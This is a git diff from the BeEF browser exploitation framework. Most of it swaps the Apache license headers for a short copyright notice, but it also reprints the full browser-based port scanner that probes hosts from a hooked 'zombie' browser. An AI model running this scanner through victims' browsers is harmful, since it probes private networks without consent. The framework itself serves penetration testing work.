diff --git a/core/main/client/encode/json.js b/core/main/client/encode/json.js
index 9a7a40c43..94fa8ba7a 100644
--- a/core/main/client/encode/json.js
+++ b/core/main/client/encode/json.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/
 
 beef.encode.json = {
diff --git a/core/main/client/geolocation.js b/core/main/client/geolocation.js
index 0da30c433..66cc639d6 100644
--- a/core/main/client/geolocation.js
+++ b/core/main/client/geolocation.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.geolocation
  *
diff --git a/core/main/client/hardware.js b/core/main/client/hardware.js
index 3376aceea..b56e30ab7 100644
--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.hardware = {
 
 	ua: navigator.userAgent,
diff --git a/core/main/client/init.js b/core/main/client/init.js
index b098d1550..f3ada7298 100644
--- a/core/main/client/init.js
+++ b/core/main/client/init.js
@@ -1,19 +1,10 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
+
 // if beef.pageIsLoaded is true, then this JS has been loaded >1 times 
 // and will have a new session id. The new session id will need to know
 // the brwoser details. So sendback the browser details again.
diff --git a/core/main/client/lib/evercookie.js b/core/main/client/lib/evercookie.js
index 4eb1be6d6..f723f6a46 100644
--- a/core/main/client/lib/evercookie.js
+++ b/core/main/client/lib/evercookie.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*
  * evercookie 0.4 (10/13/2010) -- extremely persistent cookies
  *
diff --git a/core/main/client/logger.js b/core/main/client/logger.js
index 5c3c6e2b5..3d1217c37 100644
--- a/core/main/client/logger.js
+++ b/core/main/client/logger.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.logger
  *
diff --git a/core/main/client/mitb.js b/core/main/client/mitb.js
index 626b36ce8..6d2229693 100644
--- a/core/main/client/mitb.js
+++ b/core/main/client/mitb.js
@@ -1,19 +1,10 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
+
 beef.mitb = {
 
     cid:null,
diff --git a/core/main/client/net.js b/core/main/client/net.js
index 9b471f4fd..35e46615f 100644
--- a/core/main/client/net.js
+++ b/core/main/client/net.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.net
  *
diff --git a/core/main/client/net/dns.js b/core/main/client/net/dns.js
index e2f2b8b5c..698b0301b 100644
--- a/core/main/client/net/dns.js
+++ b/core/main/client/net/dns.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.net.dns
  * 
diff --git a/core/main/client/net/local.js b/core/main/client/net/local.js
index 5aa7087ec..545ba8105 100644
--- a/core/main/client/net/local.js
+++ b/core/main/client/net/local.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.net.local
  * 
diff --git a/core/main/client/net/portscanner.js b/core/main/client/net/portscanner.js
index 75baede99..caa0131eb 100644
--- a/core/main/client/net/portscanner.js
+++ b/core/main/client/net/portscanner.js
@@ -1,63 +1,54 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-/*!
- * @literal object: beef.net.portscanner
- * 
- * Provides port scanning functions for the zombie. A mod of pdp's scanner
- * 
- * Version: '0.1',
- * author: 'Petko Petkov',
- * homepage: 'http://www.gnucitizen.org'
- */
-
-beef.net.portscanner = {
-
-		scanPort: function(callback, target, port, timeout) 
-		{
-			var timeout = (timeout == null)?100:timeout;
-			var img = new Image();
-
-			img.onerror = function () {
-				if (!img) return;
-				img = undefined;
-				callback(target, port, 'open');
-			};
-
-			img.onload  = img.onerror;
-			
-			img.src = 'http://' + target + ':' + port;
-
-			setTimeout(function () {
-				if (!img) return;
-				img = undefined;
-				callback(target, port, 'closed');
-			}, timeout);
-
-		},
-
-		scanTarget: function(callback, target, ports_str, timeout)
-		{
-			var ports = ports_str.split(",");
-
-			for (index = 0; index < ports.length; index++) {
-				this.scanPort(callback, target, ports[index], timeout);
-			};
-
-		}
-};
-
-beef.regCmp('beef.net.portscanner');
-
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*!
+ * @literal object: beef.net.portscanner
+ * 
+ * Provides port scanning functions for the zombie. A mod of pdp's scanner
+ * 
+ * Version: '0.1',
+ * author: 'Petko Petkov',
+ * homepage: 'http://www.gnucitizen.org'
+ */
+
+beef.net.portscanner = {
+
+		scanPort: function(callback, target, port, timeout) 
+		{
+			var timeout = (timeout == null)?100:timeout;
+			var img = new Image();
+
+			img.onerror = function () {
+				if (!img) return;
+				img = undefined;
+				callback(target, port, 'open');
+			};
+
+			img.onload  = img.onerror;
+			
+			img.src = 'http://' + target + ':' + port;
+
+			setTimeout(function () {
+				if (!img) return;
+				img = undefined;
+				callback(target, port, 'closed');
+			}, timeout);
+
+		},
+
+		scanTarget: function(callback, target, ports_str, timeout)
+		{
+			var ports = ports_str.split(",");
+
+			for (index = 0; index < ports.length; index++) {
+				this.scanPort(callback, target, ports[index], timeout);
+			};
+
+		}
+};
+
+beef.regCmp('beef.net.portscanner');
+
diff --git a/core/main/client/net/requester.js b/core/main/client/net/requester.js
index 8d51128f1..ad388282e 100644
--- a/core/main/client/net/requester.js
+++ b/core/main/client/net/requester.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.net.requester
  * 
diff --git a/core/main/client/os.js b/core/main/client/os.js
index 9ccea8a9c..f6dfae17c 100644
--- a/core/main/client/os.js
+++ b/core/main/client/os.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.os = {
 
 	ua: navigator.userAgent,
diff --git a/core/main/client/session.js b/core/main/client/session.js
index 040cf81a6..7d32e250b 100644
--- a/core/main/client/session.js
+++ b/core/main/client/session.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.session
  *
diff --git a/core/main/client/timeout.js b/core/main/client/timeout.js
index 6aab560cf..43d875f97 100644
--- a/core/main/client/timeout.js
+++ b/core/main/client/timeout.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*
  Sometimes there are timing issues and looks like beef_init
  is not called at all (always in cross-domain situations,
diff --git a/core/main/client/updater.js b/core/main/client/updater.js
index d8bbb13cc..5ac56823e 100644
--- a/core/main/client/updater.js
+++ b/core/main/client/updater.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @Literal object: beef.updater
  *
diff --git a/core/main/client/websocket.js b/core/main/client/websocket.js
index b834f32e4..2b5edcab4 100644
--- a/core/main/client/websocket.js
+++ b/core/main/client/websocket.js
@@ -1,19 +1,10 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
+
 //beef.websocket.socket.send(take answer to server beef)
 /*New browser init call this */
 
diff --git a/core/main/command.rb b/core/main/command.rb
index 577cd39d6..3ebd42497 100644
--- a/core/main/command.rb
+++ b/core/main/command.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/configuration.rb b/core/main/configuration.rb
index f2469e0f4..045dd9f62 100644
--- a/core/main/configuration.rb
+++ b/core/main/configuration.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/console/commandline.rb b/core/main/console/commandline.rb
index 1ad2fa025..7a06c52f9 100644
--- a/core/main/console/commandline.rb
+++ b/core/main/console/commandline.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
diff --git a/core/main/constants/browsers.rb b/core/main/constants/browsers.rb
index d43e156e5..e707d67e9 100644
--- a/core/main/constants/browsers.rb
+++ b/core/main/constants/browsers.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/constants/commandmodule.rb b/core/main/constants/commandmodule.rb
index d37cc1169..ce0f6c807 100644
--- a/core/main/constants/commandmodule.rb
+++ b/core/main/constants/commandmodule.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/constants/distributedengine.rb b/core/main/constants/distributedengine.rb
index ddbf8426f..8da3eb63f 100644
--- a/core/main/constants/distributedengine.rb
+++ b/core/main/constants/distributedengine.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/constants/hardware.rb b/core/main/constants/hardware.rb
index 12386ef78..272cf3396 100644
--- a/core/main/constants/hardware.rb
+++ b/core/main/constants/hardware.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/constants/os.rb b/core/main/constants/os.rb
index 7f94ba0c4..7c932f17d 100644
--- a/core/main/constants/os.rb
+++ b/core/main/constants/os.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/crypto.rb b/core/main/crypto.rb
index ae81ae5e6..cfce1054a 100644
--- a/core/main/crypto.rb
+++ b/core/main/crypto.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/distributed_engine/models/rules.rb b/core/main/distributed_engine/models/rules.rb
index 5061f96b1..ed35791d6 100644
--- a/core/main/distributed_engine/models/rules.rb
+++ b/core/main/distributed_engine/models/rules.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 4f597f402..60b059f3f 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
diff --git a/core/main/handlers/commands.rb b/core/main/handlers/commands.rb
index b96f45c6f..86f6e2685 100644
--- a/core/main/handlers/commands.rb
+++ b/core/main/handlers/commands.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
diff --git a/core/main/handlers/hookedbrowsers.rb b/core/main/handlers/hookedbrowsers.rb
index a5450ac91..0e004465a 100644
--- a/core/main/handlers/hookedbrowsers.rb
+++ b/core/main/handlers/hookedbrowsers.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index 38e48f05c..d3b87672d 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
